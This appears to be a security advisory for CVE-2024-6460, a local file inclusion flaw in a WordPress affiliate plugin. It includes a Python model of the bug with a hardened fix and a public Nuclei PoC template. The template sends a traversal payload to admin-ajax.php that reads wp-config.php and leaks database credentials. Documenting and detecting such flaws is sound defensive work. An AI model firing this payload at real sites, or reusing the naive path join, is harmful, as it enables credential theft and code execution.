CVE-2024-6460: WordPress Grow by Tradedoubler Plugin < 2.0.22 - Unauthenticated Local File Inclusion

Date: 2025-08-01 | Affected software: WordPress Grow by Tradedoubler Plugin | PoC: public

Vulnerability Description

The Grow by Tradedoubler WordPress plugin through version 2.0.21 (fixed in 2.0.22) is vulnerable to Local File Inclusion via the component parameter of its tm_load_data admin-ajax.php action, which is reachable without authentication. The parameter is used to build the path of a PHP file that is then included, so a traversal value such as ../../../../wp-config.php makes the server include and execute an arbitrary PHP file outside the plugin directory; in the PoC below this is confirmed by the leaked DB_NAME and DB_PASSWORD constants from wp-config.php.
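The following is an added example, not code from the plugin or from the advisory. It models the bug class described above in Python: a request parameter named component is joined onto a directory and handed to an include, with no containment check, beside a hardened resolver that enforces an exact allowlist and verifies the normalised path stays inside the base directory. The directory layout (/var/www/html, a components subdirectory) and the allowlist entries are assumptions made for the illustration; the traversal payload is the one the PoC sends.

```python
"""Added example modelling the LFI behind CVE-2024-6460 (not the plugin's code).

The vulnerable pattern is include("<plugin dir>/" . $_POST['component']).
All paths and component names below are constructed for the example.
"""
import posixpath

# Assumed layout, constructed for the example; the real plugin's include base
# may sit at a different depth, which only changes how many ../ are needed.
WP_ROOT = "/var/www/html"
PLUGIN_DIR = posixpath.join(
    WP_ROOT, "wp-content/plugins/tradedoubler-affiliate-tracker/components"
)
ALLOWED_COMPONENTS = {"dashboard", "settings"}  # hypothetical allowlist

# The payload from the public PoC (action=tm_load_data&component=...).
POC_PAYLOAD = "../../../../wp-config.php"


def vulnerable_resolve(component: str) -> str:
    """Naive join with no validation, mirroring include("$dir/$component").

    normpath collapses the ../ segments exactly as the filesystem would, so the
    returned path is what PHP's include() would open.
    """
    return posixpath.normpath(posixpath.join(PLUGIN_DIR, component))


def hardened_resolve(component: str) -> str:
    """Resolve a component name safely, or raise ValueError.

    Two independent checks, so a bypass of one is still caught by the other:
      1. exact-match allowlist of known component names (no user-controlled
         path segments reach the filesystem at all);
      2. the normalised target must remain inside PLUGIN_DIR.
    In PHP the equivalent is in_array($component, $allowed, true) plus a
    realpath() containment check against realpath($plugin_dir).
    """
    if component not in ALLOWED_COMPONENTS:
        raise ValueError(f"unknown component: {component!r}")
    target = posixpath.normpath(posixpath.join(PLUGIN_DIR, component + ".php"))
    if posixpath.commonpath([PLUGIN_DIR, target]) != PLUGIN_DIR:
        raise ValueError(f"path escapes plugin directory: {target}")
    return target


def escapes_base(component: str) -> bool:
    """True if the naive resolver would include a file outside PLUGIN_DIR."""
    target = vulnerable_resolve(component)
    return posixpath.commonpath([PLUGIN_DIR, target]) != PLUGIN_DIR


def hardened_accepts(component: str) -> bool:
    """True if the hardened resolver accepts the component name."""
    try:
        hardened_resolve(component)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for name in ("dashboard", POC_PAYLOAD, "dashboard/../../x", "settings"):
        print(f"{name!r:40} naive -> {vulnerable_resolve(name)}")
        print(f"{'':40} escapes base: {escapes_base(name)}, "
              f"hardened accepts: {hardened_accepts(name)}")
```

Under the assumed layout the PoC value resolves to /var/www/html/wp-config.php for the naive resolver, which is why the template's DB_NAME/DB_PASSWORD matchers fire. The allowlist check is the one that matters for remediation; the containment check is defence in depth for the case where a future component name is built from any user-supplied text. Independently of the resolver, an endpoint that does not need to serve anonymous visitors should not be registered on the wp_ajax_nopriv_ hook at all.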

PoC Code [Public]

id: CVE-2024-6460

info:
  name: WordPress Grow by Tradedoubler Plugin < 2.0.22 - Unauthenticated Local File Inclusion
  author: ritikchaddha
  severity: critical
  description: |
    The Grow by Tradedoubler WordPress plugin through version 2.0.21 is vulnerable to Local File Inclusion via the component parameter. This makes it possible for attackers to include and execute PHP files on the server, allowing the execution of any PHP code in those files.
  reference:
    - https://wpscan.com/vulnerability/ba2f53e0-30be-4f37-91bc-5fa151f1eee7
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6460
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-6460
    cwe-id: CWE-22
    epss-score: 0.90307
    epss-percentile: 0.9957
  metadata:
    max-request: 2
    vendor: WordPress
    product: tradedoubler-affiliate-tracker
    fofa-query: body="wp-content/plugins/tradedoubler-affiliate-tracker/"
  tags: cve,cve2024,wp,wordpress,wp-plugin,lfi,tradedoubler-affiliate-tracker,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    matchers:
      - type: word
        part: body
        words:
          - "tradedoubler-affiliate-tracker"
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        action=tm_load_data&component=../../../../wp-config.php

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c46807a62c61d6538894b9de2f5b044eab98796fd9f0dd76708b912e5723d21902202e024fdf55d705f8bb6cf5c10094085ef7c39585afa27107e9634adca45853a5:922c64590222798bb761d5b6d8e72950
